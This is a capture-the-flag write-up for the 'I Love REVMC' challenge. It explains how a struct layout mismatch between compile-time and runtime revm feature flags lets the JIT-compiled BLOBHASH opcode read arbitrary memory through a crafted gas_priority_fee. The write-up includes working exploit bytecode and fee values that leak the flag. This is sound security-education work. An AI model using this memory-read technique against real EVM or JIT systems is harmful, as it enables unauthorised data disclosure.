Skip to content

Latest commit

 

History

History
235 lines (189 loc) · 11.5 KB

i-love-revmc.md

File metadata and controls

235 lines (189 loc) · 11.5 KB

I Love REVMC

Author: cbd1913 (X/Twitter)

Background

In this challenge, we have a modified version of anvil and revm, where a JIT compiler feature is added. This feature is enabled by the revmc crate. The following are the main modifications.

foundry and anvil

  • Dependencies for revm are updated to a local path, and revmc is added. Additionally, the optional_balance_check and optional_disable_eip3074 features are enabled for revm in anvil.

  • A new JSON RPC method blaz_jitCompile is added to compile a contract's bytecode into a shared library. It will execute the jit-compiler command to compile the bytecode into a library.

    // some code is omitted for brevity
    let code = self.get_code(addr, None).await?;
    let mut prev_jit_addr = self.jit_addr.write().await;
    std::fs::write("/tmp/code.hex", hex::encode(code)).map_err(|e| {
        BlockchainError::Internal(format!("Failed to write code to /tmp/code.hex: {e}"))
    })?;
    
    let jit_compiler_path =
        std::env::var("JIT_COMPILER_PATH").unwrap_or_else(|_| "/opt/jit-compiler".to_string());
    let output = std::process::Command::new(jit_compiler_path)
        .output()
        .map_err(|e| BlockchainError::Internal(format!("Failed to run jit-compile: {e}")))?;
  • After that, jit_addr will be set in the anvil backend, and new_evm_with_jit will be used to process new transactions in executor.rs.

  • In the new transaction processing logic, it uses JitHelper::get_function to override the existing get_function in inspector.rs.

  • In JitHelper, it dynamically loads libjit.so, calls jit_init with some function pointers to initialize it, then returns real_jit_fn as EvmCompilerFn. This function should be called somewhere when a transaction is executed.

    // some code is omitted for brevity
    // open libjit.so
    let libjit = libc::dlopen(b"libjit.so\0".as_ptr() as *const libc::c_char, libc::RTLD_LAZY);
    let jit_init = libc::dlsym(libjit, b"jit_init\0".as_ptr() as *const libc::c_char);
    let mut funcs: [*mut libc::c_void; 40] = [
      revmc_builtins::__revmc_builtin_panic as _,
      // more functions ...
    ];
    let jit_init: extern "C" fn(*mut *mut libc::c_void) = std::mem::transmute(jit_init);
    jit_init(funcs.as_mut_ptr());
    
    let func = libc::dlsym(libjit, b"real_jit_fn\0".as_ptr() as *const libc::c_char);
    let func: RawEvmCompilerFn = std::mem::transmute(func);
    return Some(EvmCompilerFn::from(func));

revm and revmc

  • A field disable_authorization is added to TxEnv when the optional_disable_eip3074 feature is enabled, and disable_balance_check is moved up in CfgEnv.
  • In translate_inst inside revmc, which is the core logic of translating bytecode into IR (internal representation), it modifies the logic of processing the op::BLOBHASH instruction to use build_blobhash.
  • In build_blobhash, it has complex logic for building IR code to read the blob hash. It calculates the memory offset to read the length from the blob_hashes field in TxEnv, checks whether it's out of bounds, gets the element pointer of the desired blob hash item, reads, and returns it.

JIT Compiler

  • In linker.c, it declares many function pointers like __revmc_builtin_gas_price_ptr and __revmc_builtin_balance_ptr, which are 0 and will be set by jit_init().
  • In load_flag(), it reads the flag and stores it at memory address 0x13370000.
  • According to anvil-image/build.sh, linker.c will be compiled into libjit_dummy.o.
  • In the JIT compiler's main logic main.rs, it reads from /tmp/code.hex and uses EvmCompiler from revmc to compile it into /tmp/libjit_main.o, which is the implementation of real_jit_fn.
  • Then it's combined with /tmp/libjit_dummy.o to produce the final shared library /lib/libjit.so.

Analysis

We can understand the whole flow now:

  1. Deploy a smart contract.
  2. Call blaz_jitCompile to compile it. It executes the pre-compiled jit-compiler binary which does the following:
    • Reads the smart contract's bytecode and uses revmc to translate each EVM opcode into IR code.
    • The IR code is compiled into real_jit_fn of the shared library /lib/libjit.so.
  3. Submit a transaction with the to address being the malicious contract.
  4. real_jit_fn will be called with some arguments related to the current transaction. The program logic written by jit-compiler is executed at this step.
    • During the execution of real_jit_fn, it can call some revmc built-in functions to interact with Rust code.
  5. We need to find a way to let real_jit_fn read the flag from memory 0x13370000.

Because real_jit_fn is compiled from IR code generated by revmc, we need to find a bug in revmc which may generate incorrect IR code and cause out-of-bounds memory read. The only modified implementation in revmc is the BLOBHASH opcode, so we should investigate its logic.

fn build_blobhash(&mut self) {
    let index = self.bcx.fn_param(0);
    let env = self.bcx.fn_param(1);
    let isize_type = self.isize_type;
    let word_type = self.word_type;

    let tx_env_offset = mem::offset_of!(Env, tx);
    let blobhash_offset = mem::offset_of!(TxEnv, blob_hashes);
    let blobhash_len_offset = mem::offset_of!(pf::Vec<revm_primitives::B256>, len);
    let blobhash_ptr_offset = mem::offset_of!(pf::Vec<revm_primitives::B256>, ptr);

    let blobhash_len_ptr = self.get_field(
        env,
        tx_env_offset + blobhash_offset + blobhash_len_offset,
        "env.tx.blobhashes.len.addr",
    );
    let blobhash_ptr_ptr = self.get_field(
        env,
        tx_env_offset + blobhash_offset + blobhash_ptr_offset,
        "env.tx.blobhashes.ptr.addr",
    );

    let blobhash_len = self.bcx.load(isize_type, blobhash_len_ptr, "env.tx.blobhashes.len");
    // convert to u256
    let blobhash_len = self.bcx.zext(word_type, blobhash_len);

    // check for out of bounds
    let in_bounds = self.bcx.icmp(IntCC::UnsignedLessThan, index, blobhash_len);
    let zero = self.bcx.iconst_256(U256::ZERO);

    // if out of bounds, return 0
    let r = self.bcx.lazy_select(
        in_bounds,
        word_type,
        |bcx| {
            let index = bcx.ireduce(isize_type, index);
            let blobhash_ptr =
                bcx.load(self.ptr_type, blobhash_ptr_ptr, "env.tx.blobhashes.ptr");

            let address = bcx.gep(word_type, blobhash_ptr, &[index], "blobhash.addr");
            let tmp = bcx.new_stack_slot(word_type, "blobhash.addr");
            tmp.store(bcx, zero);
            let tmp_addr = tmp.addr(bcx);
            let tmp_word_size = bcx.iconst(isize_type, 32);
            bcx.memcpy(tmp_addr, address, tmp_word_size);

            let mut value = tmp.load(bcx, "blobhash.i256");
            if cfg!(target_endian = "little") {
                value = bcx.bswap(value);
            }
            value
        },
        |_bcx| zero,
    );

    self.bcx.ret(&[r]);
}

The main logic is:

  1. Determine the memory offset of the length of blob_hashes in Env. This is calculated by finding the offset of the Tx struct in Env, then adding the offsets of the blob_hashes field in Tx, and finally adding the offset of the len field in blob_hashes.
  2. Use the same logic to get the pointer to the first item of blob_hashes.
  3. Read the length of blob_hashes from blobhash_len_ptr, and build a condition to check whether index is out of bounds.
  4. If out of bounds, return 0. Otherwise, read the blob_hashes item at index and return it.
  5. The memory address of blob_hashes[i] is calculated by blobhash_ptr + 32 * index.

The interesting part is that this code is building another program to be executed at transaction runtime. When building IR code for the BLOBHASH operation, it doesn't know the exact input of Env and index, so it builds some symbolic logic to handle them. Therefore, if the calculated memory address of blob_hashes[i] is not as expected, it will trigger an out-of-bounds memory read.

The Bug (Spoiler)

The calculation of the blob_hashes[i] memory address is incorrect. At the compile time of the bytecode, it uses a pre-compiled jit-compiler binary, which depends on the revm and revmc crates with no other feature flags turned on. However, at runtime, anvil has enabled several features like optional_disable_eip3074 and optional_balance_check for revm, which introduces a memory layout shift in CfgEnv and TxEnv.

struct CfgEnv {
    // ...
    /// Skip balance checks if true. Adds transaction cost to balance to ensure execution doesn't fail.
    #[cfg(feature = "optional_balance_check")]
    pub disable_balance_check: bool,
    // ...
    #[cfg(feature = "optional_eip3607")]
    pub disable_eip3607: bool,
    // ...
}

struct TxEnv {
    // ...
    /// Disable authorization
    #[cfg(feature = "optional_disable_eip3074")]
    pub disable_authorization: bool,
    // ...
}

At runtime, the sizes of CfgEnv and TxEnv are larger than their sizes when building the IR code, so the memory address of the blob_hashes field in TxEnv is different. After printing the struct and size, we found that the actual shift is 48 bytes, which means the blob_hashes field in TxEnv is 48 bytes ahead of the expected position of the JIT Compiler. This causes the calculated memory address of blob_hashes[i] to point to the previous field in TxEnv, which is gas_priority_fee.

+---------------------------------+--------------------+--------------------+-----------------+
| gas_priority_fee (40 bytes)     | capacity (8 bytes) |  pointer (8 bytes) | length (8 bytes)|
+---------------------------------+--------------------+--------------------+-----------------+

After the memory shift, when it reads the blob_hashes length, it actually reads the 9th to 16th bytes of gas_priority_fee. For the blob_hashes element pointer, it reads the 1st to 8th bytes of gas_priority_fee. Therefore, we can control the value of gas_priority_fee to bypass the length check and make it read the flag!

Exploit

To read the 0x13370000 memory address, we can set index = 0 and let it read 0x13370000 from blobhash_ptr. Additionally, gas_priority_fee should be at least 2**64 so it can read 1 for blobhash_len to bypass the length check. This will make the BLOBHASH opcode return the memory content of 0x13370000 to the EVM stack. The remaining steps involve trying to leak the stack element.

My Solution

The bytecode I used is 5f496004351c60011660145760015f5260205ff35b5f5ffd:

[00] PUSH0 
[01] BLOBHASH 
[02] PUSH1          04
[04] CALLDATALOAD 
[05] SHR 
[06] PUSH1          01
[08] AND 
[09] PUSH1          14
[0b] JUMPI 
[0c] PUSH1          01
[0e] PUSH0 
[0f] MSTORE 
[10] PUSH1          20
[12] PUSH0 
[13] RETURN 
[14] JUMPDEST 
[15] PUSH0 
[16] PUSH0 
[17] REVERT

It will call BLOBHASH with index = 0 and shift the result based on call data to leak one bit of the stack element. The transaction will be reverted if the i-th bit of the stack element is 1. When sending the transaction, we need to set the max priority fee to 2**64 + 0x13370000 to meet the above condition. After sending 256 transactions, we can recover the full flag.

After checking the official solution, I found that it simply uses LOG0 to log the stack element, which is more efficient!

6008600a5f3960095ff35f495f5260205fa000

[02] PUSH1      0a
[04] PUSH0 
[05] CODECOPY 
[06] PUSH1      09
[08] PUSH0 
[09] RETURN 
[0a] PUSH0 
[0b] BLOBHASH 
[0c] PUSH0 
[0d] MSTORE 
[0e] PUSH1      20
[10] PUSH0 
[11] LOG0 
[12] STOP